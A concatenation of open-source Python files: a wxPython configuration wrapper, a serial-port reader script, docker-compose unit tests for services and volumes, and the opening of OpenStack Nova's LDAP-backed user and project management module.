# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with Glumol. If not, see <http://www.gnu.org/licenses/>.
import wx
from log import log
class ConfigManager:
    """Dict-like wrapper around the wx FileConfig backing artub.conf.

    Values are always stored and returned as strings.
    """

    def __init__(self):
        log("Loading configuration")
        self.config = wx.FileConfig("artub", "bnc", "artub.conf")

    def __getitem__(self, key):
        """Return the stored value for *key*.

        Raises KeyError for non-string keys and IndexError when the key is
        absent (both kept as-is for backward compatibility with callers).
        Returns '' if the backend fails to read an existing entry.
        """
        if not isinstance(key, str):
            raise KeyError
        if not self.config.Exists(key):
            raise IndexError
        try:
            val = self.config.Read(key)
        except Exception:
            # Was a bare "except:"; narrowed so SystemExit and
            # KeyboardInterrupt are no longer swallowed.
            return ''
        return val

    def __setitem__(self, key, item):
        """Store str(item) under *key*; raises KeyError for non-string keys."""
        if not isinstance(key, str):
            raise KeyError
        self.config.Write(key, str(item))
config = ConfigManager() | lebauce/artub | configmanager.py | Python | gpl-2.0 | 1,399 |
#!/usr/bin/env python
from argparse import ArgumentParser
import sys
import serial
from datetime import datetime
def run(device, baud, prefix=None):
    """Continuously echo lines read from the serial *device* to stdout.

    :param device: serial device path (e.g. /dev/tty.usbserial-*)
    :param baud: baud rate for the connection
    :param prefix: optional zero-argument callable whose return value is
        prepended to each line (e.g. a timestamp formatter)

    NOTE(review): on Python 3 pyserial's readline() returns bytes, so the
    ``prefix() + line`` concatenation and sys.stdout.write(line) would need
    a decode; this appears to target Python 2 - confirm before porting.
    """
    with serial.Serial(device, baud, timeout=0.1) as ser:
        while True:
            line = ser.readline()
            if not line:
                # Read timed out (0.1 s) with no data; poll again
                continue
            if prefix:
                line = prefix() + line
            sys.stdout.write(line)
if __name__ == '__main__':
    # Command-line entry point: device path, optional baud rate and an
    # optional per-line timestamp prefix.
    parser = ArgumentParser()
    parser.add_argument('device',
                        help='serial device, typically /dev/tty.usbserial-*')
    # 74880 is an unusual default baud rate - presumably chosen for
    # ESP8266 boot-ROM output; confirm against the target hardware.
    parser.add_argument('--baud', dest='baud', type=int, default=74880)
    parser.add_argument('-t', '--timestamp', dest='timestamp', action='store_true',
                        help="Add timestamp to start of each line")
    args = parser.parse_args()
    prefix = None
    if args.timestamp:
        # Evaluated once per line, so each line gets a fresh timestamp
        prefix = lambda: datetime.now().strftime("[%H:%M:%S.%f] ")
    run(args.device, args.baud, prefix)
| recursify/serial-debug-tool | serial_reader.py | Python | unlicense | 983 |
from __future__ import absolute_import
from __future__ import unicode_literals
import docker
from .. import mock
from .. import unittest
from compose.const import LABEL_CONFIG_HASH
from compose.const import LABEL_ONE_OFF
from compose.const import LABEL_PROJECT
from compose.const import LABEL_SERVICE
from compose.container import Container
from compose.service import build_volume_binding
from compose.service import ConfigError
from compose.service import ContainerNet
from compose.service import get_container_data_volumes
from compose.service import merge_volume_bindings
from compose.service import NeedsBuildError
from compose.service import Net
from compose.service import NoSuchImageError
from compose.service import parse_repository_tag
from compose.service import parse_volume_spec
from compose.service import Service
from compose.service import ServiceNet
class ServiceTest(unittest.TestCase):
    """Unit tests for compose.service.Service against a mocked docker.Client.

    No docker daemon is involved: every test stubs the autospec'd client's
    return values and asserts on the calls Service makes to it.
    """
    def setUp(self):
        # Autospec'd client: calls to non-existent client methods fail
        # loudly instead of silently succeeding.
        self.mock_client = mock.create_autospec(docker.Client)
    def test_project_validation(self):
        self.assertRaises(ConfigError, lambda: Service(name='foo', project='>', image='foo'))
        Service(name='foo', project='bar.bar__', image='foo')
    def test_containers(self):
        service = Service('db', self.mock_client, 'myproject', image='foo')
        self.mock_client.containers.return_value = []
        self.assertEqual(list(service.containers()), [])
    def test_containers_with_containers(self):
        self.mock_client.containers.return_value = [
            dict(Name=str(i), Image='foo', Id=i) for i in range(3)
        ]
        service = Service('db', self.mock_client, 'myproject', image='foo')
        self.assertEqual([c.id for c in service.containers()], list(range(3)))
        # Service must filter by the compose project/service/one-off labels
        expected_labels = [
            '{0}=myproject'.format(LABEL_PROJECT),
            '{0}=db'.format(LABEL_SERVICE),
            '{0}=False'.format(LABEL_ONE_OFF),
        ]
        self.mock_client.containers.assert_called_once_with(
            all=False,
            filters={'label': expected_labels})
    def test_container_without_name(self):
        # Containers lacking a Name must be ignored by listing/numbering
        self.mock_client.containers.return_value = [
            {'Image': 'foo', 'Id': '1', 'Name': '1'},
            {'Image': 'foo', 'Id': '2', 'Name': None},
            {'Image': 'foo', 'Id': '3'},
        ]
        service = Service('db', self.mock_client, 'myproject', image='foo')
        self.assertEqual([c.id for c in service.containers()], ['1'])
        self.assertEqual(service._next_container_number(), 2)
        self.assertEqual(service.get_container(1).id, '1')
    def test_get_volumes_from_container(self):
        container_id = 'aabbccddee'
        service = Service(
            'test',
            image='foo',
            volumes_from=[mock.Mock(id=container_id, spec=Container)])
        self.assertEqual(service._get_volumes_from(), [container_id])
    def test_get_volumes_from_service_container_exists(self):
        container_ids = ['aabbccddee', '12345']
        from_service = mock.create_autospec(Service)
        from_service.containers.return_value = [
            mock.Mock(id=container_id, spec=Container)
            for container_id in container_ids
        ]
        service = Service('test', volumes_from=[from_service], image='foo')
        self.assertEqual(service._get_volumes_from(), container_ids)
    def test_get_volumes_from_service_no_container(self):
        # When the volumes_from service has no container, one is created
        container_id = 'abababab'
        from_service = mock.create_autospec(Service)
        from_service.containers.return_value = []
        from_service.create_container.return_value = mock.Mock(
            id=container_id,
            spec=Container)
        service = Service('test', image='foo', volumes_from=[from_service])
        self.assertEqual(service._get_volumes_from(), [container_id])
        from_service.create_container.assert_called_once_with()
    def test_split_domainname_none(self):
        service = Service('foo', image='foo', hostname='name', client=self.mock_client)
        opts = service._get_container_create_options({'image': 'foo'}, 1)
        self.assertEqual(opts['hostname'], 'name', 'hostname')
        self.assertFalse('domainname' in opts, 'domainname')
    def test_memory_swap_limit(self):
        self.mock_client.create_host_config.return_value = {}
        service = Service(name='foo', image='foo', hostname='name', client=self.mock_client, mem_limit=1000000000, memswap_limit=2000000000)
        service._get_container_create_options({'some': 'overrides'}, 1)
        self.assertTrue(self.mock_client.create_host_config.called)
        self.assertEqual(
            self.mock_client.create_host_config.call_args[1]['mem_limit'],
            1000000000
        )
        self.assertEqual(
            self.mock_client.create_host_config.call_args[1]['memswap_limit'],
            2000000000
        )
    def test_log_opt(self):
        self.mock_client.create_host_config.return_value = {}
        log_opt = {'syslog-address': 'tcp://192.168.0.42:123'}
        service = Service(name='foo', image='foo', hostname='name', client=self.mock_client, log_driver='syslog', log_opt=log_opt)
        service._get_container_create_options({'some': 'overrides'}, 1)
        self.assertTrue(self.mock_client.create_host_config.called)
        self.assertEqual(
            self.mock_client.create_host_config.call_args[1]['log_config'],
            {'Type': 'syslog', 'Config': {'syslog-address': 'tcp://192.168.0.42:123'}}
        )
    def test_split_domainname_fqdn(self):
        service = Service(
            'foo',
            hostname='name.domain.tld',
            image='foo',
            client=self.mock_client)
        opts = service._get_container_create_options({'image': 'foo'}, 1)
        self.assertEqual(opts['hostname'], 'name', 'hostname')
        self.assertEqual(opts['domainname'], 'domain.tld', 'domainname')
    def test_split_domainname_both(self):
        service = Service(
            'foo',
            hostname='name',
            image='foo',
            domainname='domain.tld',
            client=self.mock_client)
        opts = service._get_container_create_options({'image': 'foo'}, 1)
        self.assertEqual(opts['hostname'], 'name', 'hostname')
        self.assertEqual(opts['domainname'], 'domain.tld', 'domainname')
    def test_split_domainname_weird(self):
        # An explicit domainname wins; only the explicit split applies
        service = Service(
            'foo',
            hostname='name.sub',
            domainname='domain.tld',
            image='foo',
            client=self.mock_client)
        opts = service._get_container_create_options({'image': 'foo'}, 1)
        self.assertEqual(opts['hostname'], 'name.sub', 'hostname')
        self.assertEqual(opts['domainname'], 'domain.tld', 'domainname')
    def test_get_container_create_options_with_name_option(self):
        service = Service(
            'foo',
            image='foo',
            client=self.mock_client,
            container_name='foo1')
        name = 'the_new_name'
        opts = service._get_container_create_options(
            {'name': name},
            1,
            one_off=True)
        self.assertEqual(opts['name'], name)
    def test_get_container_create_options_does_not_mutate_options(self):
        labels = {'thing': 'real'}
        environment = {'also': 'real'}
        service = Service(
            'foo',
            image='foo',
            labels=dict(labels),
            client=self.mock_client,
            environment=dict(environment),
        )
        self.mock_client.inspect_image.return_value = {'Id': 'abcd'}
        prev_container = mock.Mock(
            id='ababab',
            image_config={'ContainerConfig': {}})
        opts = service._get_container_create_options(
            {},
            1,
            previous_container=prev_container)
        # The service's own option dicts must be left untouched
        self.assertEqual(service.options['labels'], labels)
        self.assertEqual(service.options['environment'], environment)
        self.assertEqual(
            opts['labels'][LABEL_CONFIG_HASH],
            '3c85881a8903b9d73a06c41860c8be08acce1494ab4cf8408375966dccd714de')
        self.assertEqual(
            opts['environment'],
            {
                'affinity:container': '=ababab',
                'also': 'real',
            }
        )
    def test_get_container_not_found(self):
        self.mock_client.containers.return_value = []
        service = Service('foo', client=self.mock_client, image='foo')
        self.assertRaises(ValueError, service.get_container)
    @mock.patch('compose.service.Container', autospec=True)
    def test_get_container(self, mock_container_class):
        container_dict = dict(Name='default_foo_2')
        self.mock_client.containers.return_value = [container_dict]
        service = Service('foo', image='foo', client=self.mock_client)
        container = service.get_container(number=2)
        self.assertEqual(container, mock_container_class.from_ps.return_value)
        mock_container_class.from_ps.assert_called_once_with(
            self.mock_client, container_dict)
    @mock.patch('compose.service.log', autospec=True)
    def test_pull_image(self, mock_log):
        service = Service('foo', client=self.mock_client, image='someimage:sometag')
        service.pull()
        self.mock_client.pull.assert_called_once_with(
            'someimage',
            tag='sometag',
            stream=True)
        mock_log.info.assert_called_once_with('Pulling foo (someimage:sometag)...')
    def test_pull_image_no_tag(self):
        # Untagged image names default to :latest
        service = Service('foo', client=self.mock_client, image='ababab')
        service.pull()
        self.mock_client.pull.assert_called_once_with(
            'ababab',
            tag='latest',
            stream=True)
    @mock.patch('compose.service.log', autospec=True)
    def test_pull_image_digest(self, mock_log):
        service = Service('foo', client=self.mock_client, image='someimage@sha256:1234')
        service.pull()
        self.mock_client.pull.assert_called_once_with(
            'someimage',
            tag='sha256:1234',
            stream=True)
        mock_log.info.assert_called_once_with('Pulling foo (someimage@sha256:1234)...')
    @mock.patch('compose.service.Container', autospec=True)
    def test_recreate_container(self, _):
        # Recreation must stop, rename away, start the new one, remove the old
        mock_container = mock.create_autospec(Container)
        service = Service('foo', client=self.mock_client, image='someimage')
        service.image = lambda: {'Id': 'abc123'}
        new_container = service.recreate_container(mock_container)
        mock_container.stop.assert_called_once_with(timeout=10)
        self.mock_client.rename.assert_called_once_with(
            mock_container.id,
            '%s_%s' % (mock_container.short_id, mock_container.name))
        new_container.start.assert_called_once_with()
        mock_container.remove.assert_called_once_with()
    @mock.patch('compose.service.Container', autospec=True)
    def test_recreate_container_with_timeout(self, _):
        mock_container = mock.create_autospec(Container)
        self.mock_client.inspect_image.return_value = {'Id': 'abc123'}
        service = Service('foo', client=self.mock_client, image='someimage')
        service.recreate_container(mock_container, timeout=1)
        mock_container.stop.assert_called_once_with(timeout=1)
    def test_parse_repository_tag(self):
        self.assertEqual(parse_repository_tag("root"), ("root", "", ":"))
        self.assertEqual(parse_repository_tag("root:tag"), ("root", "tag", ":"))
        self.assertEqual(parse_repository_tag("user/repo"), ("user/repo", "", ":"))
        self.assertEqual(parse_repository_tag("user/repo:tag"), ("user/repo", "tag", ":"))
        self.assertEqual(parse_repository_tag("url:5000/repo"), ("url:5000/repo", "", ":"))
        self.assertEqual(parse_repository_tag("url:5000/repo:tag"), ("url:5000/repo", "tag", ":"))
        self.assertEqual(parse_repository_tag("root@sha256:digest"), ("root", "sha256:digest", "@"))
        self.assertEqual(parse_repository_tag("user/repo@sha256:digest"), ("user/repo", "sha256:digest", "@"))
        self.assertEqual(parse_repository_tag("url:5000/repo@sha256:digest"), ("url:5000/repo", "sha256:digest", "@"))
    @mock.patch('compose.service.Container', autospec=True)
    def test_create_container_latest_is_used_when_no_tag_specified(self, mock_container):
        service = Service('foo', client=self.mock_client, image='someimage')
        images = []
        def pull(repo, tag=None, **kwargs):
            self.assertEqual('someimage', repo)
            self.assertEqual('latest', tag)
            images.append({'Id': 'abc123'})
            return []
        service.image = lambda *args, **kwargs: mock_get_image(images)
        self.mock_client.pull = pull
        service.create_container()
        self.assertEqual(1, len(images))
    def test_create_container_with_build(self):
        service = Service('foo', client=self.mock_client, build='.')
        images = []
        service.image = lambda *args, **kwargs: mock_get_image(images)
        service.build = lambda: images.append({'Id': 'abc123'})
        service.create_container(do_build=True)
        self.assertEqual(1, len(images))
    def test_create_container_no_build(self):
        service = Service('foo', client=self.mock_client, build='.')
        service.image = lambda: {'Id': 'abc123'}
        service.create_container(do_build=False)
        self.assertFalse(self.mock_client.build.called)
    def test_create_container_no_build_but_needs_build(self):
        service = Service('foo', client=self.mock_client, build='.')
        service.image = lambda *args, **kwargs: mock_get_image([])
        with self.assertRaises(NeedsBuildError):
            service.create_container(do_build=False)
    def test_build_does_not_pull(self):
        self.mock_client.build.return_value = [
            b'{"stream": "Successfully built 12345"}',
        ]
        service = Service('foo', client=self.mock_client, build='.')
        service.build()
        self.assertEqual(self.mock_client.build.call_count, 1)
        self.assertFalse(self.mock_client.build.call_args[1]['pull'])
    def test_config_dict(self):
        self.mock_client.inspect_image.return_value = {'Id': 'abcd'}
        service = Service(
            'foo',
            image='example.com/foo',
            client=self.mock_client,
            net=ServiceNet(Service('other')),
            links=[(Service('one'), 'one')],
            volumes_from=[Service('two')])
        config_dict = service.config_dict()
        expected = {
            'image_id': 'abcd',
            'options': {'image': 'example.com/foo'},
            'links': [('one', 'one')],
            'net': 'other',
            'volumes_from': ['two'],
        }
        self.assertEqual(config_dict, expected)
    def test_config_dict_with_net_from_container(self):
        self.mock_client.inspect_image.return_value = {'Id': 'abcd'}
        container = Container(
            self.mock_client,
            {'Id': 'aaabbb', 'Name': '/foo_1'})
        service = Service(
            'foo',
            image='example.com/foo',
            client=self.mock_client,
            net=container)
        config_dict = service.config_dict()
        expected = {
            'image_id': 'abcd',
            'options': {'image': 'example.com/foo'},
            'links': [],
            'net': 'aaabbb',
            'volumes_from': [],
        }
        self.assertEqual(config_dict, expected)
class NetTestCase(unittest.TestCase):
    """Tests for the Net / ContainerNet / ServiceNet id-mode-name triples."""
    def test_net(self):
        net = Net('host')
        self.assertEqual(net.id, 'host')
        self.assertEqual(net.mode, 'host')
        self.assertEqual(net.service_name, None)
    def test_net_container(self):
        container_id = 'abcd'
        net = ContainerNet(Container(None, {'Id': container_id}))
        self.assertEqual(net.id, container_id)
        self.assertEqual(net.mode, 'container:' + container_id)
        self.assertEqual(net.service_name, None)
    def test_net_service(self):
        # A ServiceNet resolves to the service's first container
        container_id = 'bbbb'
        service_name = 'web'
        mock_client = mock.create_autospec(docker.Client)
        mock_client.containers.return_value = [
            {'Id': container_id, 'Name': container_id, 'Image': 'abcd'},
        ]
        service = Service(name=service_name, client=mock_client)
        net = ServiceNet(service)
        self.assertEqual(net.id, service_name)
        self.assertEqual(net.mode, 'container:' + container_id)
        self.assertEqual(net.service_name, service_name)
    def test_net_service_no_containers(self):
        # Without containers the mode cannot be resolved yet
        service_name = 'web'
        mock_client = mock.create_autospec(docker.Client)
        mock_client.containers.return_value = []
        service = Service(name=service_name, client=mock_client)
        net = ServiceNet(service)
        self.assertEqual(net.id, service_name)
        self.assertEqual(net.mode, None)
        self.assertEqual(net.service_name, service_name)
def mock_get_image(images):
    """Stand-in for Service.image(): first known image, or NoSuchImageError."""
    try:
        return images[0]
    except IndexError:
        raise NoSuchImageError()
class ServiceVolumesTest(unittest.TestCase):
def setUp(self):
self.mock_client = mock.create_autospec(docker.Client)
def test_parse_volume_spec_only_one_path(self):
spec = parse_volume_spec('/the/volume')
self.assertEqual(spec, (None, '/the/volume', 'rw'))
def test_parse_volume_spec_internal_and_external(self):
spec = parse_volume_spec('external:interval')
self.assertEqual(spec, ('external', 'interval', 'rw'))
def test_parse_volume_spec_with_mode(self):
spec = parse_volume_spec('external:interval:ro')
self.assertEqual(spec, ('external', 'interval', 'ro'))
spec = parse_volume_spec('external:interval:z')
self.assertEqual(spec, ('external', 'interval', 'z'))
def test_parse_volume_spec_too_many_parts(self):
with self.assertRaises(ConfigError):
parse_volume_spec('one:two:three:four')
def test_build_volume_binding(self):
binding = build_volume_binding(parse_volume_spec('/outside:/inside'))
self.assertEqual(binding, ('/inside', '/outside:/inside:rw'))
def test_get_container_data_volumes(self):
options = [
'/host/volume:/host/volume:ro',
'/new/volume',
'/existing/volume',
]
self.mock_client.inspect_image.return_value = {
'ContainerConfig': {
'Volumes': {
'/mnt/image/data': {},
}
}
}
container = Container(self.mock_client, {
'Image': 'ababab',
'Volumes': {
'/host/volume': '/host/volume',
'/existing/volume': '/var/lib/docker/aaaaaaaa',
'/removed/volume': '/var/lib/docker/bbbbbbbb',
'/mnt/image/data': '/var/lib/docker/cccccccc',
},
}, has_been_inspected=True)
expected = {
'/existing/volume': '/var/lib/docker/aaaaaaaa:/existing/volume:rw',
'/mnt/image/data': '/var/lib/docker/cccccccc:/mnt/image/data:rw',
}
binds = get_container_data_volumes(container, options)
self.assertEqual(binds, expected)
def test_merge_volume_bindings(self):
options = [
'/host/volume:/host/volume:ro',
'/host/rw/volume:/host/rw/volume',
'/new/volume',
'/existing/volume',
]
self.mock_client.inspect_image.return_value = {
'ContainerConfig': {'Volumes': {}}
}
intermediate_container = Container(self.mock_client, {
'Image': 'ababab',
'Volumes': {'/existing/volume': '/var/lib/docker/aaaaaaaa'},
}, has_been_inspected=True)
expected = [
'/host/volume:/host/volume:ro',
'/host/rw/volume:/host/rw/volume:rw',
'/var/lib/docker/aaaaaaaa:/existing/volume:rw',
]
binds = merge_volume_bindings(options, intermediate_container)
self.assertEqual(set(binds), set(expected))
def test_mount_same_host_path_to_two_volumes(self):
    """One host path may back two different container paths; both bindings
    must be produced."""
    service = Service(
        'web',
        image='busybox',
        volumes=[
            '/host/path:/data1',
            '/host/path:/data2',
        ],
        client=self.mock_client,
    )
    self.mock_client.inspect_image.return_value = {
        'Id': 'ababab',
        'ContainerConfig': {
            'Volumes': {}
        }
    }
    service._get_container_create_options(
        override_options={},
        number=1,
    )
    # both container paths appear in the binds passed to create_host_config
    self.assertEqual(
        set(self.mock_client.create_host_config.call_args[1]['binds']),
        set([
            '/host/path:/data1:rw',
            '/host/path:/data2:rw',
        ]),
    )
def test_different_host_path_in_container_json(self):
    """When the previous container reports a different real host path for
    a volume (e.g. boot2docker's /mnt/sda1 prefix), the binding must use
    the path from the container JSON, not the configured one."""
    service = Service(
        'web',
        image='busybox',
        volumes=['/host/path:/data'],
        client=self.mock_client,
    )
    self.mock_client.inspect_image.return_value = {
        'Id': 'ababab',
        'ContainerConfig': {
            'Volumes': {
                '/data': {},
            }
        }
    }
    # previous container resolved the volume to a different host location
    self.mock_client.inspect_container.return_value = {
        'Id': '123123123',
        'Image': 'ababab',
        'Volumes': {
            '/data': '/mnt/sda1/host/path',
        },
    }
    service._get_container_create_options(
        override_options={},
        number=1,
        previous_container=Container(self.mock_client, {'Id': '123123123'}),
    )
    self.assertEqual(
        self.mock_client.create_host_config.call_args[1]['binds'],
        ['/mnt/sda1/host/path:/data:rw'],
    )
def test_create_with_special_volume_mode(self):
    """A non-default mode such as SELinux's 'z' must be passed through to
    the binds untouched."""
    self.mock_client.inspect_image.return_value = {'Id': 'imageid'}
    create_calls = []

    # record create_container invocations instead of letting the mock
    # auto-generate a return value
    def create_container(*args, **kwargs):
        create_calls.append((args, kwargs))
        return {'Id': 'containerid'}

    self.mock_client.create_container = create_container
    volumes = ['/tmp:/foo:z']
    Service(
        'web',
        client=self.mock_client,
        image='busybox',
        volumes=volumes,
    ).create_container()
    self.assertEqual(len(create_calls), 1)
    self.assertEqual(self.mock_client.create_host_config.call_args[1]['binds'], volumes)
| TheDataShed/compose | tests/unit/service_test.py | Python | apache-2.0 | 22,651 |
#!/usr/bin/env python
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2010 Anso Labs, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Nova users and user management, including RBAC hooks.
"""
import datetime
import logging
import os
import shutil
import string
from string import Template
import tempfile
import uuid
import zipfile
try:
import ldap
except Exception, e:
import fakeldap as ldap
import fakeldap
from nova import datastore
# TODO(termie): clean up these imports
import signer
from nova import exception
from nova import flags
from nova import crypto
from nova import utils
from nova import objectstore # for flags
FLAGS = flags.FLAGS

# --- ldap connection and directory layout --------------------------------
flags.DEFINE_string('ldap_url', 'ldap://localhost', 'Point this at your ldap server')
flags.DEFINE_string('ldap_password', 'changeme', 'LDAP password')
flags.DEFINE_string('user_dn', 'cn=Manager,dc=example,dc=com', 'DN of admin user')
flags.DEFINE_string('user_unit', 'Users', 'OID for Users')
flags.DEFINE_string('user_ldap_subtree', 'ou=Users,dc=example,dc=com', 'OU for Users')
flags.DEFINE_string('project_ldap_subtree', 'ou=Groups,dc=example,dc=com', 'OU for Projects')
flags.DEFINE_string('role_ldap_subtree', 'ou=Groups,dc=example,dc=com', 'OU for Roles')
# mapping with these flags is necessary because we're going to tie in to an existing ldap schema
flags.DEFINE_string('ldap_cloudadmin',
        'cn=cloudadmins,ou=Groups,dc=example,dc=com', 'cn for Cloud Admins')
flags.DEFINE_string('ldap_itsec',
        'cn=itsec,ou=Groups,dc=example,dc=com', 'cn for ItSec')
flags.DEFINE_string('ldap_sysadmin',
        'cn=sysadmins,ou=Groups,dc=example,dc=com', 'cn for Sysadmins')
flags.DEFINE_string('ldap_netadmin',
        'cn=netadmins,ou=Groups,dc=example,dc=com', 'cn for NetAdmins')
flags.DEFINE_string('ldap_developer',
        'cn=developers,ou=Groups,dc=example,dc=com', 'cn for Developers')
# --- rbac shortcuts -------------------------------------------------------
# a user with one of these roles will be a superuser and have access to all api commands
flags.DEFINE_list('superuser_roles', ['cloudadmin'], 'roles that ignore rbac checking completely')
# a user with one of these roles will have it for every project, even if he or she is not a member of the project
flags.DEFINE_list('global_roles', ['cloudadmin', 'itsec'], 'roles that apply to all projects')
# --- credential / vpn packaging ------------------------------------------
flags.DEFINE_string('credentials_template',
                    utils.abspath('auth/novarc.template'),
                    'Template for creating users rc file')
flags.DEFINE_string('vpn_client_template',
                    utils.abspath('cloudpipe/client.ovpn.template'),
                    'Template for creating users vpn file')
flags.DEFINE_string('credential_key_file', 'pk.pem',
                    'Filename of private key in credentials zip')
flags.DEFINE_string('credential_cert_file', 'cert.pem',
                    'Filename of certificate in credentials zip')
flags.DEFINE_string('credential_rc_file', 'novarc',
                    'Filename of rc in credentials zip')
flags.DEFINE_string('vpn_ip', '127.0.0.1', 'Public IP for the cloudpipe VPN servers')
class AuthBase(object):
    """Common base for auth model objects that carry an ``id``."""

    @classmethod
    def safe_id(cls, obj):
        """Return ``obj.id`` when *obj* is an instance of this class,
        otherwise return *obj* unchanged.

        Lets API methods accept either model objects or raw ids as
        parameters.
        """
        return obj.id if isinstance(obj, cls) else obj
class User(AuthBase):
    """A nova user; id and name are currently the same.

    :param id: unique user id (also the ldap uid)
    :param name: display name (currently identical to id)
    :param access: ec2-style access key
    :param secret: ec2-style secret key
    :param admin: True if the user is a superuser
    """

    def __init__(self, id, name, access, secret, admin):
        self.id = id
        self.name = name
        self.access = access
        self.secret = secret
        self.admin = admin

    @property
    def vpn_port(self):
        """Port of this user's cloudpipe vpn; the next free port
        (starting at 8000) is allocated and persisted on first access."""
        # BUG FIX: self.keeper was never initialized for User (only
        # Project set one up in __init__), so this property always raised
        # AttributeError.  Create the datastore handle lazily instead of
        # in __init__ so plain User construction stays side-effect free.
        if not hasattr(self, 'keeper'):
            self.keeper = datastore.Keeper(prefix="user-")
        port_map = self.keeper['vpn_ports'] or {}
        if self.id not in port_map:  # was has_key(), deprecated
            ports = port_map.values()
            if len(ports) > 0:
                port_map[self.id] = max(ports) + 1
            else:
                port_map[self.id] = 8000
            self.keeper['vpn_ports'] = port_map
        return port_map[self.id]

    @property
    def vpn_ip(self):
        return FLAGS.vpn_ip

    def is_superuser(self):
        """allows user to bypass rbac completely"""
        if self.admin:
            return True
        for role in FLAGS.superuser_roles:
            if self.has_role(role):
                return True
        return False  # explicit; the original fell through returning None

    def is_admin(self):
        """allows user to see objects from all projects"""
        if self.is_superuser():
            return True
        for role in FLAGS.global_roles:
            if self.has_role(role):
                return True
        return False

    def has_role(self, role):
        return UserManager.instance().has_role(self, role)

    def add_role(self, role):
        return UserManager.instance().add_role(self, role)

    def remove_role(self, role):
        return UserManager.instance().remove_role(self, role)

    def is_project_member(self, project):
        return UserManager.instance().is_project_member(self, project)

    def is_project_manager(self, project):
        return UserManager.instance().is_project_manager(self, project)

    def generate_rc(self, project=None):
        """Render the novarc template with this user's credentials for
        *project* (defaults to the user's own project)."""
        if project is None:
            project = self.id
        rc = open(FLAGS.credentials_template).read()
        rc = rc % { 'access': self.access,
                    'project': project,
                    'secret': self.secret,
                    'ec2': FLAGS.ec2_url,
                    's3': 'http://%s:%s' % (FLAGS.s3_host, FLAGS.s3_port),
                    'nova': FLAGS.ca_file,
                    'cert': FLAGS.credential_cert_file,
                    'key': FLAGS.credential_key_file,
            }
        return rc

    # keypair operations are delegated to the UserManager singleton
    def generate_key_pair(self, name):
        return UserManager.instance().generate_key_pair(self.id, name)

    def create_key_pair(self, name, public_key, fingerprint):
        return UserManager.instance().create_key_pair(self.id,
                                                      name,
                                                      public_key,
                                                      fingerprint)

    def get_key_pair(self, name):
        return UserManager.instance().get_key_pair(self.id, name)

    def delete_key_pair(self, name):
        return UserManager.instance().delete_key_pair(self.id, name)

    def get_key_pairs(self):
        return UserManager.instance().get_key_pairs(self.id)

    def __repr__(self):
        return "User('%s', '%s', '%s', '%s', %s)" % (self.id, self.name, self.access, self.secret, self.admin)
class KeyPair(AuthBase):
    """A public ssh key stored under a user; id and name are the key's cn.

    :param id: key name (used as both id and name)
    :param owner_id: id of the owning user
    :param public_key: the ssh public key material
    :param fingerprint: the key's fingerprint
    """

    def __init__(self, id, owner_id, public_key, fingerprint):
        self.id = id
        self.name = id
        self.owner_id = owner_id
        self.public_key = public_key
        self.fingerprint = fingerprint

    def delete(self):
        """Remove this keypair from the directory."""
        # BUG FIX: the original passed self.owner, an attribute that is
        # never set (the constructor stores owner_id), so delete() always
        # raised AttributeError.
        return UserManager.instance().delete_key_pair(self.owner_id, self.name)

    def __repr__(self):
        return "KeyPair('%s', '%s', '%s', '%s')" % (self.id, self.owner_id, self.public_key, self.fingerprint)
class Group(AuthBase):
    """A named group of users; id and name are currently the same.

    :param id: group id (also used as the name)
    :param description: human-readable description
    :param member_ids: list of member user ids (may be None)
    """

    def __init__(self, id, description = None, member_ids = None):
        self.id = id
        self.name = id
        self.description = description
        self.member_ids = member_ids

    def has_member(self, user):
        """True if *user* (object or id) is one of this group's members.

        Robustness fix: a group constructed with member_ids=None used to
        raise TypeError here; now it simply reports no members.
        """
        return User.safe_id(user) in (self.member_ids or [])

    def __repr__(self):
        return "Group('%s', '%s', %s)" % (self.id, self.description, self.member_ids)
class Project(Group):
    """A project: a group of users with a designated manager, plus vpn
    bookkeeping and credential packaging."""

    def __init__(self, id, project_manager_id, description, member_ids):
        self.project_manager_id = project_manager_id
        super(Project, self).__init__(id, description, member_ids)
        # datastore handle used for vpn port allocation below
        self.keeper = datastore.Keeper(prefix="project-")

    @property
    def project_manager(self):
        """The User object for this project's manager."""
        return UserManager.instance().get_user(self.project_manager_id)

    def has_manager(self, user):
        """True if *user* (object or id) is this project's manager."""
        return User.safe_id(user) == self.project_manager_id

    # role operations are scoped to this project
    def add_role(self, user, role):
        return UserManager.instance().add_role(user, role, self)

    def remove_role(self, user, role):
        return UserManager.instance().remove_role(user, role, self)

    def has_role(self, user, role):
        return UserManager.instance().has_role(user, role, self)

    @property
    def vpn_port(self):
        """Port of this project's cloudpipe vpn; allocates the next free
        port (starting at 8000) on first access and persists the map.

        NOTE(review): same allocation logic as User.vpn_port — a shared
        helper would avoid the duplication."""
        port_map = self.keeper['vpn_ports']
        if not port_map: port_map = {}
        if not port_map.has_key(self.id):
            ports = port_map.values()
            if len(ports) > 0:
                port_map[self.id] = max(ports) + 1
            else:
                port_map[self.id] = 8000
        self.keeper['vpn_ports'] = port_map
        return self.keeper['vpn_ports'][self.id]

    @property
    def vpn_ip(self):
        return FLAGS.vpn_ip

    def get_credentials(self, user):
        """Build a zip of credentials for *user* in this project (novarc,
        private key, signed cert, vpn client config, CA cert) and return
        its bytes."""
        if not isinstance(user, User):
            user = UserManager.instance().get_user(user)
        rc = user.generate_rc(self.id)
        private_key, signed_cert = self.generate_x509_cert(user)

        # render the vpn client config template with this project's
        # endpoint and the credential filenames inside the zip
        configfile = open(FLAGS.vpn_client_template,"r")
        s = string.Template(configfile.read())
        configfile.close()
        config = s.substitute(keyfile=FLAGS.credential_key_file,
                              certfile=FLAGS.credential_cert_file,
                              ip=self.vpn_ip,
                              port=self.vpn_port)

        # assemble the zip in a throwaway directory, slurp it, clean up
        tmpdir = tempfile.mkdtemp()
        zf = os.path.join(tmpdir, "temp.zip")
        zippy = zipfile.ZipFile(zf, 'w')
